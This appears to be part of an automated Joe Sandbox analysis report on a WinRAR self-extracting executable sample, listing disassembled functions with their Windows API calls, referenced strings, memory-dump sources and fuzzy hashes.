                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: .lnk$d
                                                                                                    • API String ID: 2691759472-761835416
                                                                                                    • Opcode ID: c019482fd20edc2608091cc727606337fd9e86ad88cfee3edb50cd1f58eb0a1f
                                                                                                    • Instruction ID: 5c2fdcc151f054314824228d4f78657a5df9ac3743dc4abb31536cfac819a437
                                                                                                    • Opcode Fuzzy Hash: c019482fd20edc2608091cc727606337fd9e86ad88cfee3edb50cd1f58eb0a1f
                                                                                                    • Instruction Fuzzy Hash: 9EA16F72904229AADF24DBA0DD45EFA73FCAF44304F08A5A2B509F3151EE749BC4CB61
                                                                                                    Function 00E075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00E075E3
                                                                                                      • Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0
                                                                                                      • Part of subcall function 00E0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E0A598
                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0777F
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A501
                                                                                                      • Part of subcall function 00E0A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E0A325,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                    • String ID: :
                                                                                                    • API String ID: 3226429890-336475711
                                                                                                    • Opcode ID: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
                                                                                                    • Instruction ID: fa96bb53d17bcb2317064c0e362fdbd29edeadaf4c4665ca6437968e7a459501
                                                                                                    • Opcode Fuzzy Hash: e3e4dfde3c9a8ceef4ec2b2faa18613110d65bf4f525c88b9994a25cf6455893
                                                                                                    • Instruction Fuzzy Hash: 27416E71900258A9EB25EB64DC59EEEB3B8AF51300F005096B64AB20D3DB745FC9CF70
                                                                                                    Function 00E0B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: *
                                                                                                    • API String ID: 2691759472-163128923
                                                                                                    • Opcode ID: 57a941557fc6f798d42f33461122c056684a008abd1cb9e28c07487b233dd878
                                                                                                    • Instruction ID: 14c3f130ec0d85f71344d7eee18cdb74d7ee20dd829d9841f5b8885d663b0db8
                                                                                                    • Opcode Fuzzy Hash: 57a941557fc6f798d42f33461122c056684a008abd1cb9e28c07487b233dd878
                                                                                                    • Instruction Fuzzy Hash: 093160325443119ACB30AE549902A7B73E4FF90B18F15A01DF9A4B71C3F7668FC59361
                                                                                                    Function 00E1B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: }
                                                                                                    • API String ID: 176396367-4239843852
                                                                                                    • Opcode ID: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
                                                                                                    • Instruction ID: d7aa9d14f563b4078e79ff944e2f6892bddc08346aad35349c48819d5f717530
                                                                                                    • Opcode Fuzzy Hash: 11b67c9892b6e8bc9242b360b55ae64e247cab854ef03ed59f6af0ff57cc7752
                                                                                                    • Instruction Fuzzy Hash: 6421057290431A5AD731EB64E845FABB3EEDF91758F04242AF580E3141EB64DDC883A2
                                                                                                    Function 00E0F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E0F2E4
                                                                                                      • Part of subcall function 00E0F2C5: GetProcAddress.KERNEL32(00E481C8,CryptUnprotectMemory), ref: 00E0F2F4
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00E0F33E), ref: 00E0F3D2
                                                                                                    Strings
                                                                                                    • CryptUnprotectMemory failed, xrefs: 00E0F3CA
                                                                                                    • CryptProtectMemory failed, xrefs: 00E0F389
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                    • API String ID: 2190909847-396321323
                                                                                                    • Opcode ID: 15df25e1876bd29162feb48213e466b63573694fd4f014804871ba7e89d3463c
                                                                                                    • Instruction ID: 9cb644048492aa20c2dd6bec15cde4a6d351920e970e2087145907c6a35a3246
                                                                                                    • Opcode Fuzzy Hash: 15df25e1876bd29162feb48213e466b63573694fd4f014804871ba7e89d3463c
                                                                                                    • Instruction Fuzzy Hash: 4B1129316012296FDF25AF31ED45A6E3B94FF00774F045126FC417B6E1DA389DA68690
                                                                                                    Function 00E0C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: <9$?*<>|"
                                                                                                    • API String ID: 2691759472-2723886458
                                                                                                    • Opcode ID: 8762ccf8f76f681c30e86ad589eb9f5b26325afaf5c0fc5afd3b91e2ea15e196
                                                                                                    • Instruction ID: cc6ef6d7618b694878ecd68248c010cd63abb52023b873b8c337930a5dce5c03
                                                                                                    • Opcode Fuzzy Hash: 8762ccf8f76f681c30e86ad589eb9f5b26325afaf5c0fc5afd3b91e2ea15e196
                                                                                                    • Instruction Fuzzy Hash: 71F0A453A45702D5C7301F28A811732F3E4EFD5738F342A1EE5C5E72D2E6A188C0D666
                                                                                                    Function 00E1DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: Software\WinRAR SFX$
                                                                                                    • API String ID: 176396367-3959033184
                                                                                                    • Opcode ID: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
                                                                                                    • Instruction ID: 719852805a90ffdb67dc680adeb45f0089268a6cd6859b4622adde2b8535a7c5
                                                                                                    • Opcode Fuzzy Hash: b7bd1bfe6542c57a9b0d40a513dfeb1b9a11a0ba751e5c3845f7f3c2854ffbfe
                                                                                                    • Instruction Fuzzy Hash: 2E012175544258BEEB219BA1EC09FDF7FBDEB05794F001051B549B5061D7F04ACCCAA1
                                                                                                    Function 00E1AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FE5
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E11FF6
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12006
                                                                                                      • Part of subcall function 00E11FDD: _wcslen.LIBCMT ref: 00E12014
                                                                                                      • Part of subcall function 00E11FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E0B371,?,?,00000000,?,?,?), ref: 00E1202F
                                                                                                      • Part of subcall function 00E1AC04: SetCurrentDirectoryW.KERNELBASE(?,00E1AE72,C:\Users\user\Desktop,00000000,00E4946A,00000006), ref: 00E1AC08
                                                                                                    • _wcslen.LIBCMT ref: 00E1AE8B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                                    • String ID: <$C:\Users\user\Desktop
                                                                                                    • API String ID: 521417927-1688363908
                                                                                                    • Opcode ID: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
                                                                                                    • Instruction ID: e12af16e4eac8af48d463bc78a30b2e2e159834e4def307792a6b1a400632858
                                                                                                    • Opcode Fuzzy Hash: 9a2ade512807892ae6d9ebcb3b7c27c52241005d11ef5d4714296917f6b70828
                                                                                                    • Instruction Fuzzy Hash: 69017171D00218A9DF10ABA4ED0AEDF73FCAF48304F041465F605F3192E6B8A6C88AA1
                                                                                                    Function 00E2BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                      • Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
                                                                                                      • Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                      • Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863
                                                                                                    • _abort.LIBCMT ref: 00E2BB80
                                                                                                    • _free.LIBCMT ref: 00E2BBB4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_abort_free
                                                                                                    • String ID: p
                                                                                                    • API String ID: 289325740-2678736219
                                                                                                    • Opcode ID: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
                                                                                                    • Instruction ID: 15fdbd44f48bcd791a7b0f14fc037715d593f09df8cdc3609620c4b0c6053161
                                                                                                    • Opcode Fuzzy Hash: d03dab5b9904f03e4728944c9de79de29d7d8bf8f46454ce9d6c88d52bb8f782
                                                                                                    • Instruction Fuzzy Hash: 46019232D01636DFCB21AF6AA80265DBBA1BF04B25B15211AF824B73D5CB756D41CFC1
                                                                                                    Function 00E1B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: ($Z
                                                                                                    • API String ID: 2696272793-3316338816
                                                                                                    • Opcode ID: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
                                                                                                    • Instruction ID: 98d11867cd1f6b443923dd8534495a3d43d477abf216eaefee471981793c48ee
                                                                                                    • Opcode Fuzzy Hash: 8cedb3d3bb4a960509af9fa69dca698a037d6395a7ac49e1c3f3557846857a34
                                                                                                    • Instruction Fuzzy Hash: A60146B6600108FF9F059FB1EC49CEFBBADEF083947004159F906E7120E671AA48DBA0
                                                                                                    Function 00E28268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E2BF30: GetEnvironmentStringsW.KERNEL32 ref: 00E2BF39
                                                                                                      • Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2BF5C
                                                                                                      • Part of subcall function 00E2BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2BF82
                                                                                                      • Part of subcall function 00E2BF30: _free.LIBCMT ref: 00E2BF95
                                                                                                      • Part of subcall function 00E2BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2BFA4
                                                                                                    • _free.LIBCMT ref: 00E282AE
                                                                                                    • _free.LIBCMT ref: 00E282B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                    • String ID: 0"
                                                                                                    • API String ID: 400815659-420201205
                                                                                                    • Opcode ID: 2502261a1989e788efe1c4a516c0c055de73b9a09e5687cc24d29f43af0b0ef6
